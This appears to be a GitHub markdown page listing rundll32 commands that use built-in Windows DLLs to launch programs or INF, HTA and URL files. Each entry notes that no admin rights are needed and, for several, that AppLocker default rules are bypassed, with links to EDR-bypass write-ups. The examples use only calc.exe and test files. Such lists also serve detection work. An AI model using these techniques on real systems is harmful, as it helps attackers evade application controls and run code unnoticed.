A list of some DLL execution methods. Can be useful in some scenarioes.

Advpack.dll - LaunchINFSection

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: Yes

Notes:

Links:

Advpack.dll - RegisterOCX

rundll32.exe advpack.dll,RegisterOCX calc.exe

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: Yes

Notes:

Links:
- https://twitter.com/Moriarty_Meng/status/977848311603380224

zipfldr.dll - RouteTheCall

rundll32.exe zipfldr.dll,RouteTheCall calc.exe

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: Yes

Notes:

Links:
- https://twitter.com/Moriarty_Meng/status/977848311603380224

url.dll - OpenURL

rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
rundll32.exe url.dll,OpenURL "C:\test\calc.url"

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: ?

Notes:

Links:
- https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
- http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/

url.dll - FileProtocolHandler

rundll32.exe url.dll, FileProtocolHandler calc.exe

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: ?

Notes:

Links:
- http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/

ieframe.dll - OpenURL

rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: ?

Notes:

Links:
- https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
- http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/

shdocvw.dll - OpenURL

rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: ?

Notes:

Links:
- https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
- http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/

ieadvpack.dll - LaunchINFSection

rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: ?

Notes:

Links:
- https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

DLL-Execution.md

DLL-Execution.md

Advpack.dll - LaunchINFSection

Advpack.dll - RegisterOCX

zipfldr.dll - RouteTheCall

url.dll - OpenURL

url.dll - FileProtocolHandler

ieframe.dll - OpenURL

shdocvw.dll - OpenURL

ieadvpack.dll - LaunchINFSection

Files

DLL-Execution.md

Latest commit

History

DLL-Execution.md

File metadata and controls

Advpack.dll - LaunchINFSection

Advpack.dll - RegisterOCX

zipfldr.dll - RouteTheCall

url.dll - OpenURL

url.dll - FileProtocolHandler

ieframe.dll - OpenURL

shdocvw.dll - OpenURL

ieadvpack.dll - LaunchINFSection